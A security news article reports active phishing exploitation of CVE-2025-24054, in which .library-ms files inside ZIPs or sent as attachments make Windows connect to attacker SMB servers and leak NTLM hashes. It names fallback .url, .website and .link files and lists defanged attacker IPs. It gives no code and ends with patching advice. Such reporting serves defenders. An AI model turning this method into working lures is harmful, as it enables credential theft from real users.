A recently identified vulnerability in Windows, known as CVE-2025-24054, has come under scrutiny as it is actively being exploited by cybercriminals in targeted phishing campaigns aimed at both government entities and private enterprises. Initially deemed a low-risk issue, the vulnerability was addressed in Microsoft’s March 2025 Patch Tuesday updates. However, reports from BleepingComputer indicate that just days after the patches were released, researchers at Check Point observed a marked increase in exploitation attempts.
Between March 20 and 25, 2025, Check Point noted a surge in attacks linked to a specific IP address associated with the notorious Russian state-sponsored group APT28, also known as ‘Fancy Bear.’ While this connection raises concerns, researchers caution that it does not provide conclusive evidence for attribution to this group.
NTLM, or New Technology LAN Manager, is an authentication protocol developed by Microsoft that employs a challenge-response mechanism utilizing hashes instead of plain text passwords. Despite its design to enhance security, NTLM has become increasingly vulnerable to various attacks, including replay attacks and hash cracking. Consequently, Microsoft is gradually transitioning away from NTLM in favor of more secure protocols like Kerberos.
Phishing email with Dropbox link
In the phishing schemes uncovered by Check Point, attackers targeted organizations in Poland and Romania, sending emails that contained links to Dropbox-hosted ZIP archives. These archives included .library-ms files, a legitimate file type that, when accessed, reveals a Windows library aggregating files and folders from multiple sources.
In this particular attack, the .library-ms file was cleverly configured to direct users to an external SMB server controlled by the attackers. Upon unzipping the file, Windows Explorer automatically initiated a connection to the specified SMB server, exploiting the CVE-2025-24054 vulnerability. This process allowed the attackers to intercept the NTLM hashes during the authentication attempt.
In a subsequent wave of attacks, Check Point discovered that phishing emails were sent with .library-ms files as direct attachments, eliminating the need for a ZIP archive. This indicated that merely downloading the .library-ms file was sufficient to trigger NTLM authentication to the external server, showcasing the ease with which the vulnerability could be exploited.
Minimal user interaction is sufficient
On March 25, 2025, Check Point reported a global campaign wherein these malicious files were distributed without requiring any archive. Microsoft has indicated that the vulnerability can be triggered with minimal user interaction, such as a single click or even opening the context menu, without the necessity of executing the file itself.
Additionally, the malicious ZIP archive contained three other files: ‘xd.url,’ ‘xd.website,’ and ‘xd.link,’ which exploit older vulnerabilities related to NTLM hash leakage. These files appear to serve as contingency measures should the primary library-ms method fail.
Check Point identified the attackers using SMB servers with the IP addresses 159.196.128[.]120 and 194.127.179[.]157. The interception of NTLM hashes can allow attackers to bypass authentication protocols and gain elevated access privileges. Although CVE-2025-24054 is classified as a medium-severity vulnerability, the potential ramifications are significant.
Given the minimal interaction required for exploitation, organizations are advised to treat this vulnerability as a high risk. It is strongly recommended that they apply the March 2025 updates and consider disabling NTLM authentication if it is not essential to their operations.
